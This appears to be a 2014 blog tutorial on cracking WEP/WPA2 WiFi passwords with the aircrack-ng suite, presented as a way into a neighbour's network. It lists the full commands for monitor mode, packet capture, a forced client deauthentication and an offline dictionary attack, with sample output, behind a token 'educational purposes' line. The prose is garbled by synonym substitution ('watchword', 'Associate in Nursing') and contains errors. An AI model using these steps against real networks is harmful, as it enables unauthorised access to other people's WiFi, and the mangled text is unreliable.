Sunday, 19 January 2014

Wifi/WEP/WPA2 password hacking- Aircrack-ng

Now a days, we discover our neighbour WiFi network however after we try and connect it tell enter watchword. they're place watchword in sort of WEP or WPA/WPA2. Here is a few trick to hack or Crack the wireless/WiFi watchword exploitation aircrack-ng.



Hacking wireless WiFi passwords:

The most common sort of wireless security ar Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the first secret writing standards for wireless so wireless networks is secured as
wired network. There ar many open supply Utilities like aircrack-ng, weplab, WEPCrack, or
airsnort which will be utilized by bats to interrupt in by examining packets and looking out for patterns within the
encryption. WEP comes in numerous key sizes. The common key lengths ar presently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to beat the issues of WEP. WAP was supported
security protocol 802.11i commutation the 802.11 of WEP. exploitation long random passwords or passphrases
makes WPA just about uncrackable but if atiny low watchword is employed of but fourteen words it is
cracked in but one minute by aircrack-ng, largely uses passwords of but fourteen words therefore use aircrack-ng for hacking .

Securing Wireless Network

The first step of securing wireless affiliation is just employing a long random passwords atleast of
14 characters. currently if your WiFi device supports for WPA2 than use it, as several users don’t grasp that
their device supports for several security secret writing techniques.  Check your router security techniques supported that is in its configuration page.
If you don’t savvy to edit routers setting than simply open your browser and kind 192.168.1.1 in
addressbar and here you'll get your routers configuration, wherever you'll choose.

Cracking Wireless Network

As we've scan on top of this can be a straightforward task, we have a tendency to simply need to use our network card in monitor mode therefore
as to capture packets from target network. And this NIC mode is driver dependent and network is monitored exploitation  aircrack-ng. however solely tiny variety if cards support this mode below windows.
But you'll use live CD of any UNIX operating system OS (commonly get back ) or install UNIX operating system OS as virtual machine.

List of compatible cards.

Now transfer aircrack-ng for UNIX operating system or windows platform from HERE.
The aircrack-ng suite could be a assortment of command-line programs aimed toward WEP and WPA-PSK key
cracking. those we are going to be exploitation are:

airmon-ng     - script used for shift the wireless network card to watch mode
airodump-ng - for WLAN observance and capturing network packets
aireplay-ng   - accustomed generate further traffic on the wireless network
aircrack-ng   - accustomed recover the WEP key, or launch a lexicon attack on WPA-PSK exploitation the captured information.

Using aircrack-ng

First, place the cardboard in monitor mode :

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we will currently use interface mon0
Let’s realize a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                        

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet   

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe         

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Stop airodump-ng and run it once more, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this time, you have got two choices : either wait till a shopper connects and therefore the 4-way acknowledgment is
complete, or deauthenticate Associate in Nursing existing shopper and therefore force it to reassociate.  Time is cash, so let’s
force the deauthenticate. we'd like the bssid of the AP (-a) and therefore the mackintosh of a connected shopper (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng ought to indicate “WPA Handshake:” within the higher right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7        

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet         

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe 

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Stop airodump-ng and certify the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this time forward, you are doing not ought to be anyplace close to the wireless network. All cracking can
happen offline, therefore you'll stop airodump and alternative processes and even leave from the AP. In fact,
I would recommend to steer away and end up a comfortable place wherever you'll live, eat, sleep, etc.
Cracking a WPA2 PSK secret is supported bruteforcing, and it will take terribly|a really|a awfully} very long-standing.
There ar two ways in which of bruteforcing : one that's comparatively quick however doesn't guarantee success and one
that is terribly slow, however guarantees that you just can realize the key at some purpose in time.

The first possibility is by employing a worklist/drstionary file. lots of those files is found on the net (e.g.www.theargon.com or on packetstorm (see the archives)), or is generated with tools such
as John The liquidator. Once the wordlist is formed, all you wish to try to to is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 acknowledgment.
So if your wordlist is named word.lst (under /tmp/wordlists), you'll run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK secret is directly connected to the strength of your watchword file. In
other words, you will get lucky and find the key in no time, otherwise you might not get the key in the slightest degree.

The second technique (bruteforcing) are going to be successfull evidently, however it's going to take ages to complete.
Keep in mind, a WPA2 key is up to sixty four characters, therefore in theory you'd to make each
password combination with all potential character sets and feed them into aircrack.

Note: This tutorial is just for instructional functions.

No comments :

Post a Comment